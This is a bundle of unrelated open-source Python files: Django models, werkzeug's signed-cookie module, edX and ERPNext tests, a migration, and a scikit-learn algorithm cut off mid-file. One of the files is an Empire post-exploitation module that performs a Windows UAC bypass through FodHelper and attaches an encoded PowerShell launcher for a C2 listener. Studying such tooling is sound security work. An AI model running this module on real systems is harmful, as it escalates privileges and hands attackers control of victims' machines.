related_name=_("finished_quests_for_scene")) apparition_function = models.CharField(_("Name of Apparition's Function"), max_length=120, blank=True, null=True) validation_function = models.CharField(_("Name of Validation's Function"), max_length=120) def __str__(self): return "%s | for scene :%s, by NPC %s in time %s" % (self.title, self.scene, self.given_by, self.timedelta) class ObjectType(models.Model): name = models.CharField(u"Type Object Name", max_length=200) description = models.TextField("Type's Description", blank=True, null=True) short_name = models.CharField(_("Type Object's short Name"), max_length=20, unique=True) class OneObject(models.Model): name = models.CharField(_("Type Object Name"), max_length=200) type = models.ForeignKey(ObjectType, verbose_name=_("Object's Type")) description = models.TextField("Object's Description", blank=True, null=True) initial_place = models.ForeignKey(Place, verbose_name=_("Object's Initial place"), related_name=_("initial_objects_set"), blank=True, null=True) stored_in = models.ForeignKey(Place, related_name=_("objects_stored_set"), verbose_name=_("Where the object is stored"), blank=True, null=True)
mit
Evilsmevil/Tinderbox
lib/werkzeug/contrib/securecookie.py
318
12204
# -*- coding: utf-8 -*- r""" werkzeug.contrib.securecookie ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module implements a cookie that is not alterable from the client because it adds a checksum the server checks for. You can use it as session replacement if all you have is a user id or something to mark a logged in user. Keep in mind that the data is still readable from the client as a normal cookie is. However you don't have to store and flush the sessions you have at the server. Example usage: >>> from werkzeug.contrib.securecookie import SecureCookie >>> x = SecureCookie({"foo": 42, "baz": (1, 2, 3)}, "deadbeef") Dumping into a string so that one can store it in a cookie: >>> value = x.serialize() Loading from that string again: >>> x = SecureCookie.unserialize(value, "deadbeef") >>> x["baz"] (1, 2, 3) If someone modifies the cookie and the checksum is wrong the unserialize method will fail silently and return a new empty `SecureCookie` object. Keep in mind that the values will be visible in the cookie so do not store data in a cookie you don't want the user to see. Application Integration ======================= If you are using the werkzeug request objects you could integrate the secure cookie into your application like this:: from werkzeug.utils import cached_property from werkzeug.wrappers import BaseRequest from werkzeug.contrib.securecookie import SecureCookie # don't use this key but a different one; you could just use # os.urandom(20) to get something random SECRET_KEY = '\xfa\xdd\xb8z\xae\xe0}4\x8b\xea' class Request(BaseRequest): @cached_property def client_session(self): data = self.cookies.get('session_data') if not data: return SecureCookie(secret_key=SECRET_KEY) return SecureCookie.unserialize(data, SECRET_KEY) def application(environ, start_response): request = Request(environ, start_response) # get a response object here response = ... if request.client_session.should_save: session_data = request.client_session.serialize() response.set_cookie('session_data', session_data, httponly=True) return response(environ, start_response) A less verbose integration can be achieved by using shorthand methods:: class Request(BaseRequest): @cached_property def client_session(self): return SecureCookie.load_cookie(self, secret_key=COOKIE_SECRET) def application(environ, start_response): request = Request(environ, start_response) # get a response object here response = ... request.client_session.save_cookie(response) return response(environ, start_response) :copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ import pickle import base64 from hmac import new as hmac from time import time from hashlib import sha1 as _default_hash from werkzeug._compat import iteritems, text_type from werkzeug.urls import url_quote_plus, url_unquote_plus from werkzeug._internal import _date_to_unix from werkzeug.contrib.sessions import ModificationTrackingDict from werkzeug.security import safe_str_cmp from werkzeug._compat import to_native class UnquoteError(Exception): """Internal exception used to signal failures on quoting.""" class SecureCookie(ModificationTrackingDict): """Represents a secure cookie. You can subclass this class and provide an alternative mac method. The import thing is that the mac method is a function with a similar interface to the hashlib. Required methods are update() and digest(). Example usage: >>> x = SecureCookie({"foo": 42, "baz": (1, 2, 3)}, "deadbeef") >>> x["foo"] 42 >>> x["baz"] (1, 2, 3) >>> x["blafasel"] = 23 >>> x.should_save True :param data: the initial data. Either a dict, list of tuples or `None`. :param secret_key: the secret key. If not set `None` or not specified it has to be set before :meth:`serialize` is called. :param new: The initial value of the `new` flag. """ #: The hash method to use. This has to be a module with a new function #: or a function that creates a hashlib object. Such as `hashlib.md5` #: Subclasses can override this attribute. The default hash is sha1. #: Make sure to wrap this in staticmethod() if you store an arbitrary #: function there such as hashlib.sha1 which might be implemented #: as a function. hash_method = staticmethod(_default_hash) #: the module used for serialization. Unless overriden by subclasses #: the standard pickle module is used. serialization_method = pickle #: if the contents should be base64 quoted. This can be disabled if the #: serialization process returns cookie safe strings only. quote_base64 = True def __init__(self, data=None, secret_key=None, new=True): ModificationTrackingDict.__init__(self, data or ()) # explicitly convert it into a bytestring because python 2.6 # no longer performs an implicit string conversion on hmac if secret_key is not None: secret_key = bytes(secret_key) self.secret_key = secret_key self.new = new def __repr__(self): return '<%s %s%s>' % ( self.__class__.__name__, dict.__repr__(self), self.should_save and '*' or '' ) @property def should_save(self): """True if the session should be saved. By default this is only true for :attr:`modified` cookies, not :attr:`new`. """ return self.modified @classmethod def quote(cls, value): """Quote the value for the cookie. This can be any object supported by :attr:`serialization_method`. :param value: the value to quote. """ if cls.serialization_method is not None: value = cls.serialization_method.dumps(value) if cls.quote_base64: value = b''.join(base64.b64encode(value).splitlines()).strip() return value @classmethod def unquote(cls, value): """Unquote the value for the cookie. If unquoting does not work a :exc:`UnquoteError` is raised. :param value: the value to unquote. """ try: if cls.quote_base64: value = base64.b64decode(value) if cls.serialization_method is not None: value = cls.serialization_method.loads(value) return value except Exception: # unfortunately pickle and other serialization modules can # cause pretty every error here. if we get one we catch it # and convert it into an UnquoteError raise UnquoteError() def serialize(self, expires=None): """Serialize the secure cookie into a string. If expires is provided, the session will be automatically invalidated after expiration when you unseralize it. This provides better protection against session cookie theft. :param expires: an optional expiration date for the cookie (a :class:`datetime.datetime` object) """ if self.secret_key is None: raise RuntimeError('no secret key defined') if expires: self['_expires'] = _date_to_unix(expires) result = [] mac = hmac(self.secret_key, None, self.hash_method) for key, value in sorted(self.items()): result.append(('%s=%s' % ( url_quote_plus(key), self.quote(value).decode('ascii') )).encode('ascii')) mac.update(b'|' + result[-1]) return b'?'.join([ base64.b64encode(mac.digest()).strip(), b'&'.join(result) ]) @classmethod def unserialize(cls, string, secret_key): """Load the secure cookie from a serialized string. :param string: the cookie value to unserialize. :param secret_key: the secret key used to serialize the cookie. :return: a new :class:`SecureCookie`. """ if isinstance(string, text_type): string = string.encode('utf-8', 'replace') if isinstance(secret_key, text_type): secret_key = secret_key.encode('utf-8', 'replace') try: base64_hash, data = string.split(b'?', 1) except (ValueError, IndexError): items = () else: items = {} mac = hmac(secret_key, None, cls.hash_method) for item in data.split(b'&'): mac.update(b'|' + item) if not b'=' in item: items = None break key, value = item.split(b'=', 1) # try to make the key a string key = url_unquote_plus(key.decode('ascii')) try: key = to_native(key) except UnicodeError: pass items[key] = value # no parsing error and the mac looks okay, we can now # sercurely unpickle our cookie. try: client_hash = base64.b64decode(base64_hash) except TypeError: items = client_hash = None if items is not None and safe_str_cmp(client_hash, mac.digest()): try: for key, value in iteritems(items): items[key] = cls.unquote(value) except UnquoteError: items = () else: if '_expires' in items: if time() > items['_expires']: items = () else: del items['_expires'] else: items = () return cls(items, secret_key, False) @classmethod def load_cookie(cls, request, key='session', secret_key=None): """Loads a :class:`SecureCookie` from a cookie in request. If the cookie is not set, a new :class:`SecureCookie` instanced is returned. :param request: a request object that has a `cookies` attribute which is a dict of all cookie values. :param key: the name of the cookie. :param secret_key: the secret key used to unquote the cookie. Always provide the value even though it has no default! """ data = request.cookies.get(key) if not data: return cls(secret_key=secret_key) return cls.unserialize(data, secret_key) def save_cookie(self, response, key='session', expires=None, session_expires=None, max_age=None, path='/', domain=None, secure=None, httponly=False, force=False): """Saves the SecureCookie in a cookie on response object. All parameters that are not described here are forwarded directly to :meth:`~BaseResponse.set_cookie`. :param response: a response object that has a :meth:`~BaseResponse.set_cookie` method. :param key: the name of the cookie. :param session_expires: the expiration date of the secure cookie stored information. If this is not provided the cookie `expires` date is used instead. """ if force or self.should_save: data = self.serialize(session_expires or expires) response.set_cookie(key, data, expires=expires, max_age=max_age, path=path, domain=domain, secure=secure, httponly=httponly)
apache-2.0
synergeticsedx/deployment-wipro
common/test/acceptance/pages/lms/login_and_register.py
8
13114
"""Login and Registration pages """ from urllib import urlencode from bok_choy.page_object import PageObject, unguarded from bok_choy.promise import Promise, EmptyPromise from common.test.acceptance.pages.lms import BASE_URL from common.test.acceptance.pages.lms.dashboard import DashboardPage class RegisterPage(PageObject): """ Registration page (create a new account) """ def __init__(self, browser, course_id): """ Course ID is currently of the form "edx/999/2013_Spring" but this format could change. """ super(RegisterPage, self).__init__(browser) self._course_id = course_id @property def url(self): """ URL for the registration page of a course. """ return "{base}/register?course_id={course_id}&enrollment_action={action}".format( base=BASE_URL, course_id=self._course_id, action="enroll", ) def is_browser_on_page(self): return any([ 'register' in title.lower() for title in self.q(css='span.title-sub').text ]) def provide_info(self, email, password, username, full_name): """ Fill in registration info. `email`, `password`, `username`, and `full_name` are the user's credentials. """ self.wait_for_element_visibility('input#email', 'Email field is shown') self.q(css='input#email').fill(email) self.q(css='input#password').fill(password) self.q(css='input#username').fill(username) self.q(css='input#name').fill(full_name) self.q(css='input#tos-yes').first.click() self.q(css='input#honorcode-yes').first.click() self.q(css="#country option[value='US']").first.click() def submit(self): """ Submit registration info to create an account. """ self.q(css='button#submit').first.click() # The next page is the dashboard; make sure it loads dashboard = DashboardPage(self.browser) dashboard.wait_for_page() return dashboard class ResetPasswordPage(PageObject): """Initialize the page. Arguments: browser (Browser): The browser instance. """ url = BASE_URL + "/login#forgot-password-modal" def __init__(self, browser): super(ResetPasswordPage, self).__init__(browser) def is_browser_on_page(self): return ( self.q(css="#login-anchor").is_present() and self.q(css="#password-reset-anchor").is_present() ) def is_form_visible(self): return ( not self.q(css="#login-anchor").visible and self.q(css="#password-reset-form").visible ) def fill_password_reset_form(self, email): """ Fill in the form and submit it """ self.wait_for_element_visibility('#password-reset-email', 'Reset Email field is shown') self.q(css="#password-reset-email").fill(email) self.q(css="button.js-reset").click() def is_success_visible(self, selector): """ Check element is visible """ self.wait_for_element_visibility(selector, 'Success div is shown') def get_success_message(self): """ Return a success message displayed to the user """ return self.q(css=".submission-success h4").text class CombinedLoginAndRegisterPage(PageObject): """Interact with combined login and registration page. This page is currently hidden behind the feature flag `ENABLE_COMBINED_LOGIN_REGISTRATION`, which is enabled in the bok choy settings. When enabled, the new page is available from either `/login` or `/register`; the new page is also served at `/account/login/` or `/account/register/`, where it was available for a time during an A/B test. Users can reach this page while attempting to enroll in a course, in which case users will be auto-enrolled when they successfully authenticate (unless the course has been paywalled). """ def __init__(self, browser, start_page="register", course_id=None): """Initialize the page. Arguments: browser (Browser): The browser instance. Keyword Args: start_page (str): Whether to start on the login or register page. course_id (unicode): If provided, load the page as if the user is trying to enroll in a course. """ super(CombinedLoginAndRegisterPage, self).__init__(browser) self._course_id = course_id if start_page not in ["register", "login"]: raise ValueError("Start page must be either 'register' or 'login'") self._start_page = start_page @property def url(self): """Return the URL for the combined login/registration page. """ url = "{base}/{login_or_register}".format( base=BASE_URL, login_or_register=self._start_page ) # These are the parameters that would be included if the user # were trying to enroll in a course. if self._course_id is not None: url += "?{params}".format( params=urlencode({ "course_id": self._course_id, "enrollment_action": "enroll" }) ) return url def is_browser_on_page(self): """Check whether the combined login/registration page has loaded. """ return ( self.q(css="#login-anchor").is_present() and self.q(css="#register-anchor").is_present() and self.current_form is not None ) def toggle_form(self): """Toggle between the login and registration forms. """ old_form = self.current_form # Toggle the form if old_form == "login": self.q(css=".form-toggle[data-type='register']").click() else: self.q(css=".form-toggle[data-type='login']").click() # Wait for the form to change before returning EmptyPromise( lambda: self.current_form != old_form, "Finish toggling to the other form" ).fulfill() def register( self, email="", password="", username="", full_name="", country="", favorite_movie="", terms_of_service=False ): """Fills in and submits the registration form. Requires that the "register" form is visible. This does NOT wait for the next page to load, so the caller should wait for the next page (or errors if that's the expected behavior.) Keyword Arguments: email (unicode): The user's email address. password (unicode): The user's password. username (unicode): The user's username. full_name (unicode): The user's full name. country (unicode): Two-character country code. terms_of_service (boolean): If True, agree to the terms of service and honor code. """ # Fill in the form self.wait_for_element_visibility('#register-email', 'Email field is shown') if email: self.q(css="#register-email").fill(email) if full_name: self.q(css="#register-name").fill(full_name) if username: self.q(css="#register-username").fill(username) if password: self.q(css="#register-password").fill(password) if country: self.q(css="#register-country option[value='{country}']".format(country=country)).click() if favorite_movie: self.q(css="#register-favorite_movie").fill(favorite_movie) if terms_of_service: self.q(css="#register-honor_code").click() # Submit it self.q(css=".register-button").click() def login(self, email="", password=""): """Fills in and submits the login form. Requires that the "login" form is visible. This does NOT wait for the next page to load, so the caller should wait for the next page (or errors if that's the expected behavior). Keyword Arguments: email (unicode): The user's email address. password (unicode): The user's password. """ # Fill in the form self.wait_for_element_visibility('#login-email', 'Email field is shown') self.q(css="#login-email").fill(email) self.q(css="#login-password").fill(password) # Submit it self.q(css=".login-button").click() def click_third_party_dummy_provider(self): """Clicks on the Dummy third party provider login button. Requires that the "login" form is visible. This does NOT wait for the ensuing page[s] to load. Only the "Dummy" provider is used for bok choy because it is the only one that doesn't send traffic to external servers. """ self.q(css="button.{}-oa2-dummy".format(self.current_form)).click() def password_reset(self, email): """Navigates to, fills in, and submits the password reset form. Requires that the "login" form is visible. Keyword Arguments: email (unicode): The user's email address. """ login_form = self.current_form # Click the password reset link on the login page self.q(css=".forgot-password").click() # Wait for the password reset form to load EmptyPromise( lambda: self.current_form != login_form, "Finish toggling to the password reset form" ).fulfill() # Fill in the form self.wait_for_element_visibility('#password-reset-email', 'Email field is shown') self.q(css="#password-reset-email").fill(email) # Submit it self.q(css="button.js-reset").click() return CombinedLoginAndRegisterPage(self.browser).wait_for_page() @property @unguarded def current_form(self): """Return the form that is currently visible to the user. Returns: Either "register", "login", or "password-reset" if a valid form is loaded. If we can't find any of these forms on the page, return None. """ if self.q(css=".register-button").visible: return "register" elif self.q(css=".login-button").visible: return "login" elif self.q(css=".js-reset").visible: return "password-reset" elif self.q(css=".proceed-button").visible: return "hinted-login" @property def email_value(self): """ Current value of the email form field """ return self.q(css="#register-email").attrs('value')[0] @property def full_name_value(self): """ Current value of the full_name form field """ return self.q(css="#register-name").attrs('value')[0] @property def username_value(self): """ Current value of the username form field """ return self.q(css="#register-username").attrs('value')[0] @property def errors(self): """Return a list of errors displayed to the user. """ return self.q(css=".submission-error li").text def wait_for_errors(self): """Wait for errors to be visible, then return them. """ def _check_func(): """Return success status and any errors that occurred.""" errors = self.errors return (bool(errors), errors) return Promise(_check_func, "Errors are visible").fulfill() @property def success(self): """Return a success message displayed to the user.""" if self.q(css=".submission-success").visible: return self.q(css=".submission-success h4").text def wait_for_success(self): """Wait for a success message to be visible, then return it.""" def _check_func(): """Return success status and any errors that occurred.""" success = self.success return (bool(success), success) return Promise(_check_func, "Success message is visible").fulfill() @unguarded # Because we go from this page -> temporary page -> this page again when testing the Dummy provider def wait_for_auth_status_message(self): """Wait for a status message to be visible following third_party registration, then return it.""" def _check_func(): """Return third party auth status notice message.""" selector = '.js-auth-warning p' msg_element = self.q(css=selector) if msg_element.visible: return (True, msg_element.text[0]) return (False, None) return Promise(_check_func, "Result of third party auth is visible").fulfill() @property def hinted_login_prompt(self): """Get the message displayed to the user on the hinted-login form""" if self.q(css=".wrapper-other-login .instructions").visible: return self.q(css=".wrapper-other-login .instructions").text[0]
agpl-3.0
rohitwaghchaure/erpnext_develop
erpnext/setup/doctype/currency_exchange/test_currency_exchange.py
12
3584
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe, unittest from erpnext.setup.utils import get_exchange_rate test_records = frappe.get_test_records('Currency Exchange') def save_new_records(test_records): for record in test_records: kwargs = dict( doctype=record.get("doctype"), docname=record.get("date") + '-' + record.get("from_currency") + '-' + record.get("to_currency"), fieldname="exchange_rate", value=record.get("exchange_rate"), ) try: frappe.set_value(**kwargs) except frappe.DoesNotExistError: curr_exchange = frappe.new_doc(record.get("doctype")) curr_exchange.date = record["date"] curr_exchange.from_currency = record["from_currency"] curr_exchange.to_currency = record["to_currency"] curr_exchange.exchange_rate = record["exchange_rate"] curr_exchange.insert() class TestCurrencyExchange(unittest.TestCase): def clear_cache(self): cache = frappe.cache() key = "currency_exchange_rate:{0}:{1}".format("USD", "INR") cache.delete(key) def tearDown(self): frappe.db.set_value("Accounts Settings", None, "allow_stale", 1) self.clear_cache() def test_exchange_rate(self): save_new_records(test_records) frappe.db.set_value("Accounts Settings", None, "allow_stale", 1) # Start with allow_stale is True exchange_rate = get_exchange_rate("USD", "INR", "2016-01-01") self.assertEqual(exchange_rate, 60.0) exchange_rate = get_exchange_rate("USD", "INR", "2016-01-15") self.assertEqual(exchange_rate, 65.1) exchange_rate = get_exchange_rate("USD", "INR", "2016-01-30") self.assertEqual(exchange_rate, 62.9) # Exchange rate as on 15th Dec, 2015, should be fetched from fixer.io self.clear_cache() exchange_rate = get_exchange_rate("USD", "INR", "2015-12-15") self.assertFalse(exchange_rate == 60) self.assertEqual(exchange_rate, 66.894) def test_exchange_rate_strict(self): # strict currency settings frappe.db.set_value("Accounts Settings", None, "allow_stale", 0) frappe.db.set_value("Accounts Settings", None, "stale_days", 1) exchange_rate = get_exchange_rate("USD", "INR", "2016-01-01") self.assertEqual(exchange_rate, 60.0) # Will fetch from fixer.io self.clear_cache() exchange_rate = get_exchange_rate("USD", "INR", "2016-01-15") self.assertEqual(exchange_rate, 67.79) exchange_rate = get_exchange_rate("USD", "INR", "2016-01-30") self.assertEqual(exchange_rate, 62.9) # Exchange rate as on 15th Dec, 2015, should be fetched from fixer.io self.clear_cache() exchange_rate = get_exchange_rate("USD", "INR", "2015-12-15") self.assertEqual(exchange_rate, 66.894) exchange_rate = get_exchange_rate("INR", "NGN", "2016-01-10") self.assertEqual(exchange_rate, 65.1) # NGN is not available on fixer.io so these should return 0 exchange_rate = get_exchange_rate("INR", "NGN", "2016-01-09") self.assertEqual(exchange_rate, 0) exchange_rate = get_exchange_rate("INR", "NGN", "2016-01-11") self.assertEqual(exchange_rate, 0) def test_exchange_rate_strict_switched(self): # Start with allow_stale is True exchange_rate = get_exchange_rate("USD", "INR", "2016-01-15") self.assertEqual(exchange_rate, 65.1) frappe.db.set_value("Accounts Settings", None, "allow_stale", 0) frappe.db.set_value("Accounts Settings", None, "stale_days", 1) # Will fetch from fixer.io self.clear_cache() exchange_rate = get_exchange_rate("USD", "INR", "2016-01-15") self.assertEqual(exchange_rate, 67.79)
gpl-3.0
s1n4/django-categories
categories/migrations/0011_move_category_fks.py
14
3989
# encoding: utf-8 import datetime from south.db import db from south.v2 import DataMigration from django.db import models class Migration(DataMigration): def forwards(self, orm): "Write your forwards methods here." orm.CategoryRelation.objects.update(category=models.F('story')) def backwards(self, orm): "Write your backwards methods here." orm.CategoryRelation.objects.update(story=models.F('category')) models = { 'categories.category': { 'Meta': {'ordering': "('tree_id', 'lft')", 'unique_together': "(('parent', 'name'),)", 'object_name': 'Category'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'alternate_title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}), 'alternate_url': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}), 'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}), 'meta_extra': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}), 'meta_keywords': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['categories.Category']"}), 'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}), 'thumbnail': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}), 'thumbnail_height': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'thumbnail_width': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}) }, 'categories.categoryrelation': { 'Meta': {'object_name': 'CategoryRelation'}, 'category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'new_cats'", 'null': 'True', 'to': "orm['categories.Category']"}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}), 'relation_type': ('django.db.models.fields.CharField', [], {'max_length': "'200'", 'null': 'True', 'blank': 'True'}), 'story': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['categories.Category']"}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) } } complete_apps = ['categories']
apache-2.0
byt3bl33d3r/Empire
lib/modules/powershell/privesc/bypassuac_fodhelper.py
12
4031
from lib.common import helpers class Module: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'Invoke-FodHelperBypass', 'Author': ['Petr Medonos'], 'Description': ("Bypasses UAC by performing an registry modification for FodHelper (based on" "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/)"), 'Background' : True, 'OutputExtension' : None, 'NeedsAdmin' : False, 'OpsecSafe' : False, 'Language' : 'powershell', 'MinLanguageVersion' : '2', 'Comments': [ 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/', ] } # any options needed by the module, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Agent' : { 'Description' : 'Agent to run module on.', 'Required' : True, 'Value' : '' }, 'Listener' : { 'Description' : 'Listener to use.', 'Required' : True, 'Value' : '' }, 'UserAgent' : { 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'Proxy' : { 'Description' : 'Proxy to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'ProxyCreds' : { 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' } } # save off a copy of the mainMenu object to access external functionality # like listeners/agent handlers/etc. self.mainMenu = mainMenu for param in params: # parameter format is [Name, Value] option, value = param if option in self.options: self.options[option]['Value'] = value def generate(self, obfuscate=False, obfuscationCommand=""): listenerName = self.options['Listener']['Value'] # staging options userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-FodHelperBypass.ps1" try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode if not self.mainMenu.listeners.is_listener_valid(listenerName): # not a valid listener, return nothing for the script print helpers.color("[!] Invalid listener: " + listenerName) return "" else: # generate the PowerShell one-liner with all of the proper options set launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) encScript = launcher.split(" ")[-1] if launcher == "": print helpers.color("[!] Error in launcher generation.") return "" else: script += "Invoke-FodHelperBypass -Command \"%s\"" % (encScript) return script
bsd-3-clause
marcsans/cnn-physics-perception
phy/lib/python2.7/site-packages/sklearn/utils/linear_assignment_.py
67
9524
""" Solve the unique lowest-cost assignment problem using the Hungarian algorithm (also known as Munkres algorithm). """ # Based on original code by Brain Clapper, adapted to NumPy by Gael Varoquaux. # Heavily refactored by Lars Buitinck. # # TODO: a version of this algorithm has been incorporated in SciPy; use that # when SciPy 0.17 is released. # Copyright (c) 2008 Brian M. Clapper <bmc@clapper.org>, Gael Varoquaux # Author: Brian M. Clapper, Gael Varoquaux # LICENSE: BSD import numpy as np from .fixes import astype def linear_assignment(X): """Solve the linear assignment problem using the Hungarian algorithm. The problem is also known as maximum weight matching in bipartite graphs. The method is also known as the Munkres or Kuhn-Munkres algorithm. Parameters ---------- X : array The cost matrix of the bipartite graph Returns ------- indices : array, The pairs of (row, col) indices in the original array giving the original ordering. References ---------- 1. http://www.public.iastate.edu/~ddoty/HungarianAlgorithm.html 2. Harold W. Kuhn. The Hungarian Method for the assignment problem. *Naval Research Logistics Quarterly*, 2:83-97, 1955. 3. Harold W. Kuhn. Variants of the Hungarian method for assignment problems. *Naval Research Logistics Quarterly*, 3: 253-258, 1956. 4. Munkres, J. Algorithms for the Assignment and Transportation Problems. *Journal of the Society of Industrial and Applied Mathematics*, 5(1):32-38, March, 1957. 5. https://en.wikipedia.org/wiki/Hungarian_algorithm """ indices = _hungarian(X).tolist() indices.sort() # Re-force dtype to ints in case of empty list indices = np.array(indices, dtype=int) # Make sure the array is 2D with 2 columns. # This is needed when dealing with an empty list indices.shape = (-1, 2) return indices class _HungarianState(object): """State of one execution of the Hungarian algorithm. Parameters ---------- cost_matrix : 2D matrix The cost matrix. Does not have to be square. """ def __init__(self, cost_matrix): cost_matrix = np.atleast_2d(cost_matrix) # If there are more rows (n) than columns (m), then the algorithm # will not be able to work correctly. Therefore, we # transpose the cost function when needed. Just have to # remember to swap the result columns back later. transposed = (cost_matrix.shape[1] < cost_matrix.shape[0]) if transposed: self.C = (cost_matrix.T).copy() else: self.C = cost_matrix.copy() self.transposed = transposed # At this point, m >= n. n, m = self.C.shape self.row_uncovered = np.ones(n, dtype=np.bool) self.col_uncovered = np.ones(m, dtype=np.bool) self.Z0_r = 0 self.Z0_c = 0 self.path = np.zeros((n + m, 2), dtype=int) self.marked = np.zeros((n, m), dtype=int) def _find_prime_in_row(self, row): """ Find the first prime element in the specified row. Returns the column index, or -1 if no starred element was found. """ col = np.argmax(self.marked[row] == 2) if self.marked[row, col] != 2: col = -1 return col def _clear_covers(self): """Clear all covered matrix cells""" self.row_uncovered[:] = True self.col_uncovered[:] = True def _hungarian(cost_matrix): """The Hungarian algorithm. Calculate the Munkres solution to the classical assignment problem and return the indices for the lowest-cost pairings. Parameters ---------- cost_matrix : 2D matrix The cost matrix. Does not have to be square. Returns ------- indices : 2D array of indices The pairs of (row, col) indices in the original array giving the original ordering. """ state = _HungarianState(cost_matrix) # No need to bother with assignments if one of the dimensions # of the cost matrix is zero-length. step = None if 0 in cost_matrix.shape else _step1 while step is not None: step = step(state) # Look for the starred columns results = np.array(np.where(state.marked == 1)).T # We need to swap the columns because we originally # did a transpose on the input cost matrix. if state.transposed: results = results[:, ::-1] return results # Individual steps of the algorithm follow, as a state machine: they return # the next step to be taken (function to be called), if any. def _step1(state): """Steps 1 and 2 in the Wikipedia page.""" # Step1: For each row of the matrix, find the smallest element and # subtract it from every element in its row. state.C -= state.C.min(axis=1)[:, np.newaxis] # Step2: Find a zero (Z) in the resulting matrix. If there is no # starred zero in its row or column, star Z. Repeat for each element # in the matrix. for i, j in zip(*np.where(state.C == 0)): if state.col_uncovered[j] and state.row_uncovered[i]: state.marked[i, j] = 1 state.col_uncovered[j] = False state.row_uncovered[i] = False state._clear_covers() return _step3 def _step3(state): """ Cover each column containing a starred zero. If n columns are covered, the starred zeros describe a complete set of unique assignments. In this case, Go to DONE, otherwise, Go to Step 4. """ marked = (state.marked == 1) state.col_uncovered[np.any(marked, axis=0)] = False if marked.sum() < state.C.shape[0]: return _step4 def _step4(state): """ Find a noncovered zero and prime it. If there is no starred zero in the row containing this primed zero, Go to Step 5. Otherwise, cover this row and uncover the column containing the starred zero. Continue in this manner until there are no uncovered zeros left. Save the smallest uncovered value and Go to Step 6. """ # We convert to int as numpy operations are faster on int C = (state.C == 0).astype(np.int) covered_C = C * state.row_uncovered[:, np.newaxis] covered_C *= astype(state.col_uncovered, dtype=np.int, copy=False) n = state.C.shape[0] m = state.C.shape[1] while True: # Find an uncovered zero row, col = np.unravel_index(np.argmax(covered_C), (n, m)) if covered_C[row, col] == 0: return _step6 else: state.marked[row, col] = 2 # Find the first starred element in the row star_col = np.argmax(state.marked[row] == 1) if not state.marked[row, star_col] == 1: # Could not find one state.Z0_r = row state.Z0_c = col return _step5 else: col = star_col state.row_uncovered[row] = False state.col_uncovered[col] = True covered_C[:, col] = C[:, col] * ( astype(state.row_uncovered, dtype=np.int, copy=False)) covered_C[row] = 0 def _step5(state): """ Construct a series of alternating primed and starred zeros as follows. Let Z0 represent the uncovered primed zero found in Step 4. Let Z1 denote the starred zero in the column of Z0 (if any). Let Z2 denote the primed zero in the row of Z1 (there will always be one). Continue until the series terminates at a primed zero that has no starred zero in its column. Unstar each starred zero of the series, star each primed zero of the series, erase all primes and uncover every line in the matrix. Return to Step 3 """ count = 0 path = state.path path[count, 0] = state.Z0_r path[count, 1] = state.Z0_c while True: # Find the first starred element in the col defined by # the path. row = np.argmax(state.marked[:, path[count, 1]] == 1) if not state.marked[row, path[count, 1]] == 1: # Could not find one break else: count += 1 path[count, 0] = row path[count, 1] = path[count - 1, 1] # Find the first prime element in the row defined by the # first path step col = np.argmax(state.marked[path[count, 0]] == 2) if state.marked[row, col] != 2: col = -1 count += 1 path[count, 0] = path[count - 1, 0] path[count, 1] = col # Convert paths for i in range(count + 1): if state.marked[path[i, 0], path[i, 1]] == 